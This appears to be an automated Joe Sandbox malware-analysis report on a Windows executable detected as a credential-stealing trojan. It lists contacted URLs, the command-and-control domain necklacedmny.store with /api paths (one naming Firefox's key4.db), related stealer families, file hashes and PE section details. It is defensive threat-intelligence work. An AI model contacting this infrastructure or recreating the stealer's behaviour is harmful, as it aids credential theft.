                                            http://crl.microsoftfile.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://necklacedmny.store/api%4file.exe, 00000000.00000002.2238361947.0000000001781000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://necklacedmny.store/apir4vfile.exe, 00000000.00000003.2197756892.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197549478.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238361947.0000000001781000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2216276849.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2233689266.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://x1.c.lencr.org/0file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://x1.i.lencr.org/0file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.mozilla.orfile.exe, 00000000.00000003.2168566128.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://necklacedmny.store/apid4dfile.exe, 00000000.00000003.2216276849.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2233689266.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://necklacedmny.store/$$file.exe, 00000000.00000003.2154108274.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154027869.0000000005DB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://necklacedmny.store:443/apiKfile.exe, 00000000.00000002.2238112404.00000000016DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://necklacedmny.store/api2ffile.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/99=file.exe, 00000000.00000003.2185780103.0000000001772000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186041761.0000000001772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://necklacedmny.store/dfile.exe, 00000000.00000002.2238361947.0000000001766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://necklacedmny.store/mfile.exe, 00000000.00000002.2238361947.0000000001766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://necklacedmny.store/file.exe, 00000000.00000003.2154027869.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2216337376.000000000175F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197575644.0000000001765000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238112404.0000000001759000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://necklacedmny.store:443/api.default-release/key4.dbPKfile.exe, 00000000.00000002.2238112404.00000000016DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://necklacedmny.store/Dfile.exe, 00000000.00000003.2216337376.000000000175F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://necklacedmny.store/apinfile.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://necklacedmny.store/apijfile.exe, 00000000.00000002.2238112404.0000000001759000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  188.114.97.3
                                                                                  		necklacedmny.storeEuropean Union
                                                                                  		13335CLOUDFLARENETUStrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1545916
                                                                                  Start date and time:2024-10-31 10:14:10 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 3m 56s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:3
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:file.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:Failed
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Stop behavior analysis, all processes terminated

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.242.39.171
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: file.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  05:15:02API Interceptor9x Sleep call for process: file.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  188.114.97.3lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/alpha2/five/fre.php
                                                                                  Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/vdlzo
                                                                                  Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.bayarcepat19.click/g48c/
                                                                                  zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/alpha2/five/fre.php
                                                                                  rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.launchdreamidea.xyz/2b9b/
                                                                                  rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                  • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                  PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                  • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.cc101.pro/4hfb/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  fp2e7a.wpc.phicdn.netnew order - PO 351081.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 192.229.221.95
                                                                                  https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 192.229.221.95
                                                                                  https://uslpsz.efkbkot.xyz/e7e68e62c/JV9-MXEwfF9fJSVeKl/8jaSp4fjVfMW/EzJV4vXiNeJHw9OXxufDBAZSp5YzkhdDNlZG8lN0AjJGd-fD8kIXJ8Kg2Get hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  http://mindmeters.bizGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  http://luckywinsweep.com/4HSvRF1826gInt84duwrkafbng636FPJGMZWGTSQLQDN54756JUOR308k9Get hashmaliciousPhisherBrowse
                                                                                  • 192.229.221.95
                                                                                  https://management.bafropon.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                  • 192.229.221.95
                                                                                  bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                  • 192.229.221.95
                                                                                  SecuriteInfo.com.Win32.RATX-gen.1803.21030.exeGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#Get hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSPO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  • 188.114.97.3
                                                                                  .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.24.14
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                                  • 188.114.97.3
                                                                                  Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  http://archzine.netGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  UCLouvain.onepkgGet hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  https://naimestyles.com/rtwo/n/3rrLaAvg41CM3J4mAJYroltS/c3BhY2VpbnZpZGVvc0Blc2EuaW50Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  https://uslpsz.efkbkot.xyz/e7e68e62c/JV9-MXEwfF9fJSVeKl/8jaSp4fjVfMW/EzJV4vXiNeJHw9OXxufDBAZSp5YzkhdDNlZG8lN0AjJGd-fD8kIXJ8Kg2Get hashmaliciousUnknownBrowse
                                                                                  • 172.67.220.207
                                                                                  http://luckywinsweep.com/4tTAnN1826Wdfo84jjvakjqbux636KVMMHSLZEESXXFW54756LTNO308c9Get hashmaliciousPhisherBrowse
                                                                                  • 188.114.97.3

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                                  • 188.114.97.3
                                                                                  Swift payment confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                  • 188.114.97.3

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  No created / dropped files found

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.583214509383469
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:2'948'608 bytes
                                                                                  MD5:cec67349e89de3d1bfd88f409f7c0ed2
                                                                                  SHA1:9779ec5b940cbab0acf08548e41400ab9010503f
                                                                                  SHA256:bf4dd45749338c3f9fec76ba69cb27ab2ceb995c54056efa681b07629413bb27
                                                                                  SHA512:7433c2743854125f3a6897fb4f17d84108b570f0f430e9dadf5f941c6959653de71627f12cc7008fb6676bd49534960e7b60c5cadc875f5b4c4830e2e778b0ec
                                                                                  SSDEEP:49152:fgwaAVu5RbFLOuWeTacsWUK3mT5hDc8SwT8HWbzOk:35uRbdOuWeXlUKe5jv82bzO
                                                                                  TLSH:5CD54AD1744973CBD48A2A749437DD46AC5C03F88B2858DBE86C78BA7EB3DC119B6C24
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@..........................@0....."Q-...@.................................T...h..

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x701000
                                                                                  Entrypoint Section:.taggant
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp 00007F84089C24BAh
                                                                                  paddusb mm5, qword ptr [eax+eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  jmp 00007F84089C44B5h
                                                                                  add byte ptr [ebx], cl
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax+00h], ah
                                                                                  add byte ptr [eax], al
                                                                                  aam 8Fh
                                                                                  pop ebx
                                                                                  sldt word ptr [eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  or ecx, dword ptr [edx]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  push es
                                                                                  add byte ptr [eax], 00000000h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  adc byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  pop es
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  0x10000x580000x27e008b3152d1a7a8bf4bb0cd47745aa90c45False0.9980958561912225SysEx File - JEN7.9798196062320015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  xzzshnci0x5b0000x2a50000x2a4400c42553196153f8df49e7212161993c58unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  tqazcifb0x3000000x10000x400f6384c5de3a42baddd0a01cd055756d3False0.7666015625data6.088946465385244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .taggant0x3010000x30000x22004484da0008af475fa8e3615c95c9f99bFalse0.060317095588235295DOS executable (COM)0.76167639275755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                                  Imports

                                                                                  DLLImport
                                                                                  kernel32.dlllstrcpy

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
